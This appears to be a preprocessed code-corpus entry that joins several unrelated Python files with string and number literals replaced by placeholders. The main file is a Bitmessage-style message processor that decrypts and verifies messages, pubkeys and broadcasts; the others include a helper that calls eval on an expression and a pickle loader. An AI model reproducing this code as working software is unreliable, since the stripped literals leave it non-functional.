<EOL> def load_obj ( name ) : <EOL> with open ( config . __SESSIONS_DIR__ + "<STR_LIT:/>" + str ( name ) + '<STR_LIT>' , '<STR_LIT:rb>' ) as f : <EOL> return pickle . load ( f ) </s>
<s> from . read import ReadTestCase , ParameterTypeTestCase <EOL> from . write import WriteTestCase , DatabaseCommandTestCase <EOL> from . transaction import AtomicTestCase <EOL> from . thread_safety import ThreadSafetyTestCase <EOL> from . multi_db import MultiDatabaseTestCase <EOL> from . settings import SettingsTestCase <EOL> from . api import APITestCase , CommandTestCase <EOL> from . signals import SignalsTestCase <EOL> from . postgres import PostgresReadTest </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from tree import __version__ <EOL> CURRENT_PATH = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> with open ( os . path . join ( CURRENT_PATH , '<STR_LIT>' ) ) as f : <EOL> required = f . read ( ) . splitlines ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> install_requires = required , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> ) </s>
<s> def id_modifier ( expression ) : <EOL> """<STR_LIT>""" <EOL> placeholder = re . compile ( "<STR_LIT>" ) <EOL> try : <EOL> return eval ( "<STR_LIT>" + placeholder . sub ( "<STR_LIT>" , expression ) . replace ( "<STR_LIT>" , "<STR_LIT:%>" ) ) <EOL> except SyntaxError as e : <EOL> error ( "<STR_LIT>" % ( e . text , '<STR_LIT:U+0020>' * ( e . offset - <NUM_LIT:1> ) ) ) </s>
<s> import time <EOL> import threading <EOL> import shared <EOL> import hashlib <EOL> import random <EOL> from struct import unpack , pack <EOL> import sys <EOL> import string <EOL> from subprocess import call <EOL> import traceback <EOL> from pyelliptic . openssl import OpenSSL <EOL> import highlevelcrypto <EOL> from addresses import * <EOL> import helper_generic <EOL> from helper_generic import addDataPadding <EOL> import helper_bitcoin <EOL> import helper_inbox <EOL> import helper_sent <EOL> from helper_sql import * <EOL> import tr <EOL> from debug import logger <EOL> import l10n <EOL> class objectProcessor ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> threading . Thread . __init__ ( self ) <EOL> """<STR_LIT>""" <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> for row in queryreturn : <EOL> objectType , data = row <EOL> shared . objectProcessorQueueSize += len ( data ) <EOL> shared . objectProcessorQueue . put ( ( objectType , data ) ) <EOL> sqlExecute ( '''<STR_LIT>''' ) <EOL> logger . debug ( '<STR_LIT>' % str ( len ( queryreturn ) ) ) <EOL> def run ( self ) : <EOL> while True : <EOL> objectType , data = shared . objectProcessorQueue . get ( ) <EOL> try : <EOL> if objectType == <NUM_LIT:0> : <EOL> self . processgetpubkey ( data ) <EOL> elif objectType == <NUM_LIT:1> : <EOL> self . processpubkey ( data ) <EOL> elif objectType == <NUM_LIT:2> : <EOL> self . processmsg ( data ) <EOL> elif objectType == <NUM_LIT:3> : <EOL> self . processbroadcast ( data ) <EOL> elif objectType == '<STR_LIT>' : <EOL> pass <EOL> else : <EOL> logger . critical ( '<STR_LIT>' % str ( objectType ) ) <EOL> except varintDecodeError as e : <EOL> logger . debug ( "<STR_LIT>" % e ) <EOL> except Exception as e : <EOL> logger . critical ( "<STR_LIT>" % traceback . format_exc ( ) ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> shared . objectProcessorQueueSize -= len ( data ) <EOL> if shared . shutdown : <EOL> time . sleep ( <NUM_LIT> ) <EOL> numberOfObjectsThatWereInTheObjectProcessorQueue = <NUM_LIT:0> <EOL> with SqlBulkExecute ( ) as sql : <EOL> while shared . objectProcessorQueueSize > <NUM_LIT:1> : <EOL> objectType , data = shared . objectProcessorQueue . get ( ) <EOL> sql . execute ( '''<STR_LIT>''' , <EOL> objectType , data ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> shared . objectProcessorQueueSize -= len ( data ) <EOL> numberOfObjectsThatWereInTheObjectProcessorQueue += <NUM_LIT:1> <EOL> logger . debug ( '<STR_LIT>' % str ( numberOfObjectsThatWereInTheObjectProcessorQueue ) ) <EOL> shared . shutdown = <NUM_LIT:2> <EOL> break <EOL> def processgetpubkey ( self , data ) : <EOL> readPosition = <NUM_LIT:20> <EOL> requestedAddressVersionNumber , addressVersionLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += addressVersionLength <EOL> streamNumber , streamNumberLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += streamNumberLength <EOL> if requestedAddressVersionNumber == <NUM_LIT:0> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> elif requestedAddressVersionNumber == <NUM_LIT:1> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> elif requestedAddressVersionNumber > <NUM_LIT:4> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> myAddress = '<STR_LIT>' <EOL> if requestedAddressVersionNumber <= <NUM_LIT:3> : <EOL> requestedHash = data [ readPosition : readPosition + <NUM_LIT:20> ] <EOL> if len ( requestedHash ) != <NUM_LIT:20> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . info ( '<STR_LIT>' % requestedHash . encode ( '<STR_LIT>' ) ) <EOL> if requestedHash in shared . myAddressesByHash : <EOL> myAddress = shared . myAddressesByHash [ requestedHash ] <EOL> elif requestedAddressVersionNumber >= <NUM_LIT:4> : <EOL> requestedTag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> if len ( requestedTag ) != <NUM_LIT:32> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' % requestedTag . encode ( '<STR_LIT>' ) ) <EOL> if requestedTag in shared . myAddressesByTag : <EOL> myAddress = shared . myAddressesByTag [ requestedTag ] <EOL> if myAddress == '<STR_LIT>' : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if decodeAddress ( myAddress ) [ <NUM_LIT:1> ] != requestedAddressVersionNumber : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> if decodeAddress ( myAddress ) [ <NUM_LIT:2> ] != streamNumber : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> if shared . safeConfigGetBoolean ( myAddress , '<STR_LIT>' ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> try : <EOL> lastPubkeySendTime = int ( shared . config . get ( <EOL> myAddress , '<STR_LIT>' ) ) <EOL> except : <EOL> lastPubkeySendTime = <NUM_LIT:0> <EOL> if lastPubkeySendTime > time . time ( ) - <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' % lastPubkeySendTime ) <EOL> return <EOL> logger . info ( '<STR_LIT>' ) <EOL> if requestedAddressVersionNumber == <NUM_LIT:2> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , requestedHash ) ) <EOL> elif requestedAddressVersionNumber == <NUM_LIT:3> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , requestedHash ) ) <EOL> elif requestedAddressVersionNumber == <NUM_LIT:4> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , myAddress ) ) <EOL> def processpubkey ( self , data ) : <EOL> pubkeyProcessingStartTime = time . time ( ) <EOL> shared . numberOfPubkeysProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> embeddedTime , = unpack ( '<STR_LIT>' , data [ <NUM_LIT:8> : <NUM_LIT:16> ] ) <EOL> readPosition = <NUM_LIT:20> <EOL> addressVersion , varintLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> streamNumber , varintLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> if addressVersion == <NUM_LIT:0> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> if addressVersion > <NUM_LIT:4> or addressVersion == <NUM_LIT:1> : <EOL> logger . info ( '<STR_LIT>' % addressVersion ) <EOL> return <EOL> if addressVersion == <NUM_LIT:2> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> bitfieldBehaviors = data [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> publicSigningKey = data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> publicEncryptionKey = data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> if len ( publicEncryptionKey ) < <NUM_LIT:64> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += <NUM_LIT:64> <EOL> dataToStore = data [ <NUM_LIT:20> : readPosition ] <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( <EOL> '<STR_LIT>' + publicSigningKey + '<STR_LIT>' + publicEncryptionKey ) <EOL> ripeHasher = hashlib . new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> ripe = ripeHasher . digest ( ) <EOL> logger . debug ( '<STR_LIT>' % ( addressVersion , <EOL> streamNumber , <EOL> ripe . encode ( '<STR_LIT>' ) , <EOL> publicSigningKey . encode ( '<STR_LIT>' ) , <EOL> publicEncryptionKey . encode ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> address = encodeAddress ( addressVersion , streamNumber , ripe ) <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , address ) <EOL> if queryreturn != [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT:yes>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT>' ) <EOL> sqlExecute ( '''<STR_LIT>''' , * t ) <EOL> self . possibleNewPubkey ( address ) <EOL> if addressVersion == <NUM_LIT:3> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> bitfieldBehaviors = data [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> publicSigningKey = '<STR_LIT>' + data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> publicEncryptionKey = '<STR_LIT>' + data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> specifiedNonceTrialsPerByte , specifiedNonceTrialsPerByteLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += specifiedNonceTrialsPerByteLength <EOL> specifiedPayloadLengthExtraBytes , specifiedPayloadLengthExtraBytesLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += specifiedPayloadLengthExtraBytesLength <EOL> endOfSignedDataPosition = readPosition <EOL> dataToStore = data [ <NUM_LIT:20> : readPosition ] <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = data [ readPosition : readPosition + signatureLength ] <EOL> if highlevelcrypto . verify ( data [ <NUM_LIT:8> : endOfSignedDataPosition ] , signature , publicSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( publicSigningKey + publicEncryptionKey ) <EOL> ripeHasher = hashlib . new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> ripe = ripeHasher . digest ( ) <EOL> logger . debug ( '<STR_LIT>' % ( addressVersion , <EOL> streamNumber , <EOL> ripe . encode ( '<STR_LIT>' ) , <EOL> publicSigningKey . encode ( '<STR_LIT>' ) , <EOL> publicEncryptionKey . encode ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> address = encodeAddress ( addressVersion , streamNumber , ripe ) <EOL> queryreturn = sqlQuery ( '''<STR_LIT>''' , address ) <EOL> if queryreturn != [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT:yes>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT>' ) <EOL> sqlExecute ( '''<STR_LIT>''' , * t ) <EOL> self . possibleNewPubkey ( address ) <EOL> if addressVersion == <NUM_LIT:4> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> tag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> if tag not in shared . neededPubkeys : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> toAddress , cryptorObject = shared . neededPubkeys [ tag ] <EOL> if shared . decryptAndCheckPubkeyPayload ( data , toAddress ) == '<STR_LIT>' : <EOL> self . possibleNewPubkey ( toAddress ) <EOL> timeRequiredToProcessPubkey = time . time ( <EOL> ) - pubkeyProcessingStartTime <EOL> logger . debug ( '<STR_LIT>' % timeRequiredToProcessPubkey ) <EOL> def processmsg ( self , data ) : <EOL> messageProcessingStartTime = time . time ( ) <EOL> shared . numberOfMessagesProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> readPosition = <NUM_LIT:20> <EOL> msgVersion , msgVersionLength = decodeVarint ( data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if msgVersion != <NUM_LIT:1> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += msgVersionLength <EOL> streamNumberAsClaimedByMsg , streamNumberAsClaimedByMsgLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += streamNumberAsClaimedByMsgLength <EOL> inventoryHash = calculateInventoryHash ( data ) <EOL> initialDecryptionSuccessful = False <EOL> if data [ - <NUM_LIT:32> : ] in shared . ackdataForWhichImWatching : <EOL> logger . info ( '<STR_LIT>' ) <EOL> del shared . ackdataForWhichImWatching [ data [ - <NUM_LIT:32> : ] ] <EOL> sqlExecute ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> int ( time . time ( ) ) , <EOL> data [ - <NUM_LIT:32> : ] ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( data [ - <NUM_LIT:32> : ] , tr . translateText ( "<STR_LIT>" , '<STR_LIT>' ) . arg ( l10n . formatTimestamp ( ) ) ) ) ) <EOL> return <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> for key , cryptorObject in shared . myECCryptorObjects . items ( ) : <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> toRipe = key <EOL> initialDecryptionSuccessful = True <EOL> logger . info ( '<STR_LIT>' % key . encode ( '<STR_LIT>' ) ) <EOL> break <EOL> except Exception as err : <EOL> pass <EOL> if not initialDecryptionSuccessful : <EOL> logger . info ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> return <EOL> toAddress = shared . myAddressesByHash [ <EOL> toRipe ] <EOL> readPosition = <NUM_LIT:0> <EOL> sendersAddressVersionNumber , sendersAddressVersionNumberLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += sendersAddressVersionNumberLength <EOL> if sendersAddressVersionNumber == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if sendersAddressVersionNumber > <NUM_LIT:4> : <EOL> logger . info ( '<STR_LIT>' % sendersAddressVersionNumber ) <EOL> return <EOL> if len ( decryptedData ) < <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> sendersStreamNumber , sendersStreamNumberLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> if sendersStreamNumber == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersStreamNumberLength <EOL> behaviorBitfield = decryptedData [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> pubSigningKey = '<STR_LIT>' + decryptedData [ <EOL> readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> pubEncryptionKey = '<STR_LIT>' + decryptedData [ <EOL> readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> if sendersAddressVersionNumber >= <NUM_LIT:3> : <EOL> requiredAverageProofOfWorkNonceTrialsPerByte , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . info ( '<STR_LIT>' % requiredAverageProofOfWorkNonceTrialsPerByte ) <EOL> requiredPayloadLengthExtraBytes , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . info ( '<STR_LIT>' % requiredPayloadLengthExtraBytes ) <EOL> endOfThePublicKeyPosition = readPosition <EOL> if toRipe != decryptedData [ readPosition : readPosition + <NUM_LIT:20> ] : <EOL> logger . info ( '<STR_LIT>' % ( toRipe . encode ( '<STR_LIT>' ) , decryptedData [ readPosition : readPosition + <NUM_LIT:20> ] . encode ( '<STR_LIT>' ) ) <EOL> ) <EOL> return <EOL> readPosition += <NUM_LIT:20> <EOL> messageEncodingType , messageEncodingTypeLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += messageEncodingTypeLength <EOL> messageLength , messageLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += messageLengthLength <EOL> message = decryptedData [ readPosition : readPosition + messageLength ] <EOL> readPosition += messageLength <EOL> ackLength , ackLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += ackLengthLength <EOL> ackData = decryptedData [ readPosition : readPosition + ackLength ] <EOL> readPosition += ackLength <EOL> positionOfBottomOfAckData = readPosition <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = decryptedData [ <EOL> readPosition : readPosition + signatureLength ] <EOL> signedData = data [ <NUM_LIT:8> : <NUM_LIT:20> ] + encodeVarint ( <NUM_LIT:1> ) + encodeVarint ( streamNumberAsClaimedByMsg ) + decryptedData [ : positionOfBottomOfAckData ] <EOL> if not highlevelcrypto . verify ( signedData , signature , pubSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' % <EOL> ( helper_bitcoin . calculateBitcoinAddressFromPubkey ( pubSigningKey ) , helper_bitcoin . calculateTestnetAddressFromPubkey ( pubSigningKey ) ) <EOL> ) <EOL> sigHash = hashlib . sha512 ( hashlib . sha512 ( signature ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( pubSigningKey + pubEncryptionKey ) <EOL> ripe = hashlib . new ( '<STR_LIT>' ) <EOL> ripe . update ( sha . digest ( ) ) <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersionNumber , sendersStreamNumber , ripe . digest ( ) ) <EOL> sqlExecute ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress , <EOL> sendersAddressVersionNumber , <EOL> decryptedData [ : endOfThePublicKeyPosition ] , <EOL> int ( time . time ( ) ) , <EOL> '<STR_LIT:yes>' ) <EOL> self . possibleNewPubkey ( fromAddress ) <EOL> if decodeAddress ( toAddress ) [ <NUM_LIT:1> ] >= <NUM_LIT:3> and not shared . safeConfigGetBoolean ( toAddress , '<STR_LIT>' ) : <EOL> if not shared . isAddressInMyAddressBookSubscriptionsListOrWhitelist ( fromAddress ) : <EOL> requiredNonceTrialsPerByte = shared . config . getint ( <EOL> toAddress , '<STR_LIT>' ) <EOL> requiredPayloadLengthExtraBytes = shared . config . getint ( <EOL> toAddress , '<STR_LIT>' ) <EOL> if not shared . isProofOfWorkSufficient ( data , requiredNonceTrialsPerByte , requiredPayloadLengthExtraBytes ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> blockMessage = False <EOL> if shared . config . get ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' : <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress ) <EOL> if queryreturn != [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> else : <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress ) <EOL> if queryreturn == [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> toLabel = shared . config . get ( toAddress , '<STR_LIT:label>' ) <EOL> if toLabel == '<STR_LIT>' : <EOL> toLabel = toAddress <EOL> if messageEncodingType == <NUM_LIT:2> : <EOL> subject , body = self . decodeType2Message ( message ) <EOL> logger . info ( '<STR_LIT>' % repr ( subject ) [ : <NUM_LIT:100> ] ) <EOL> elif messageEncodingType == <NUM_LIT:1> : <EOL> body = message <EOL> subject = '<STR_LIT>' <EOL> elif messageEncodingType == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> subject = '<STR_LIT>' <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = '<STR_LIT>' + repr ( message ) <EOL> subject = '<STR_LIT>' <EOL> if helper_inbox . isMessageAlreadyInInbox ( sigHash ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> if not blockMessage : <EOL> if messageEncodingType != <NUM_LIT:0> : <EOL> t = ( inventoryHash , toAddress , fromAddress , subject , int ( <EOL> time . time ( ) ) , body , '<STR_LIT>' , messageEncodingType , <NUM_LIT:0> , sigHash ) <EOL> helper_inbox . insert ( t ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> inventoryHash , toAddress , fromAddress , subject , body ) ) ) <EOL> if shared . safeConfigGetBoolean ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> apiNotifyPath = shared . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> apiNotifyPath = '<STR_LIT>' <EOL> if apiNotifyPath != '<STR_LIT>' : <EOL> call ( [ apiNotifyPath , "<STR_LIT>" ] ) <EOL> if shared . safeConfigGetBoolean ( toAddress , '<STR_LIT>' ) : <EOL> try : <EOL> mailingListName = shared . config . get ( <EOL> toAddress , '<STR_LIT>' ) <EOL> except : <EOL> mailingListName = '<STR_LIT>' <EOL> subject = self . addMailingListNameToSubject ( <EOL> subject , mailingListName ) <EOL> message = time . strftime ( "<STR_LIT>" , time . gmtime ( <EOL> ) ) + '<STR_LIT>' + fromAddress + '<STR_LIT>' + body <EOL> fromAddress = toAddress <EOL> ackdataForBroadcast = OpenSSL . rand ( <EOL> <NUM_LIT:32> ) <EOL> toAddress = '<STR_LIT>' <EOL> ripe = '<STR_LIT>' <EOL> TTL = <NUM_LIT:2> * <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> t = ( '<STR_LIT>' , <EOL> toAddress , <EOL> ripe , <EOL> fromAddress , <EOL> subject , <EOL> message , <EOL> ackdataForBroadcast , <EOL> int ( time . time ( ) ) , <EOL> int ( time . time ( ) ) , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:2> , <EOL> TTL ) <EOL> helper_sent . insert ( t ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> toAddress , '<STR_LIT>' , fromAddress , subject , message , ackdataForBroadcast ) ) ) <EOL> shared . workerQueue . put ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . ackDataHasAVaildHeader ( ackData ) : <EOL> shared . checkAndShareObjectWithPeers ( ackData [ <NUM_LIT> : ] ) <EOL> timeRequiredToAttemptToDecryptMessage = time . time ( <EOL> ) - messageProcessingStartTime <EOL> shared . successfullyDecryptMessageTimings . append ( <EOL> timeRequiredToAttemptToDecryptMessage ) <EOL> sum = <NUM_LIT:0> <EOL> for item in shared . successfullyDecryptMessageTimings : <EOL> sum += item <EOL> logger . debug ( '<STR_LIT>' % <EOL> ( timeRequiredToAttemptToDecryptMessage , sum / len ( shared . successfullyDecryptMessageTimings ) ) <EOL> ) <EOL> def processbroadcast ( self , data ) : <EOL> messageProcessingStartTime = time . time ( ) <EOL> shared . numberOfBroadcastsProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> inventoryHash = calculateInventoryHash ( data ) <EOL> readPosition = <NUM_LIT:20> <EOL> broadcastVersion , broadcastVersionLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += broadcastVersionLength <EOL> if broadcastVersion < <NUM_LIT:4> or broadcastVersion > <NUM_LIT:5> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> cleartextStreamNumber , cleartextStreamNumberLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += cleartextStreamNumberLength <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> """<STR_LIT>""" <EOL> signedData = data [ <NUM_LIT:8> : readPosition ] <EOL> initialDecryptionSuccessful = False <EOL> for key , cryptorObject in shared . MyECSubscriptionCryptorObjects . items ( ) : <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> toRipe = key <EOL> initialDecryptionSuccessful = True <EOL> logger . info ( '<STR_LIT>' % key . encode ( '<STR_LIT>' ) ) <EOL> break <EOL> except Exception as err : <EOL> pass <EOL> if not initialDecryptionSuccessful : <EOL> logger . debug ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> embeddedTag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> readPosition += <NUM_LIT:32> <EOL> if embeddedTag not in shared . MyECSubscriptionCryptorObjects : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> signedData = data [ <NUM_LIT:8> : readPosition ] <EOL> cryptorObject = shared . MyECSubscriptionCryptorObjects [ embeddedTag ] <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> logger . debug ( '<STR_LIT>' % broadcastVersion ) <EOL> return <EOL> readPosition = <NUM_LIT:0> <EOL> sendersAddressVersion , sendersAddressVersionLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> if sendersAddressVersion < <NUM_LIT:2> or sendersAddressVersion > <NUM_LIT:3> : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> if sendersAddressVersion < <NUM_LIT:4> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersAddressVersionLength <EOL> sendersStream , sendersStreamLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if sendersStream != cleartextStreamNumber : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersStreamLength <EOL> behaviorBitfield = decryptedData [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> sendersPubSigningKey = '<STR_LIT>' + decryptedData [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> sendersPubEncryptionKey = '<STR_LIT>' + decryptedData [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> if sendersAddressVersion >= <NUM_LIT:3> : <EOL> requiredAverageProofOfWorkNonceTrialsPerByte , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . debug ( '<STR_LIT>' % requiredAverageProofOfWorkNonceTrialsPerByte ) <EOL> 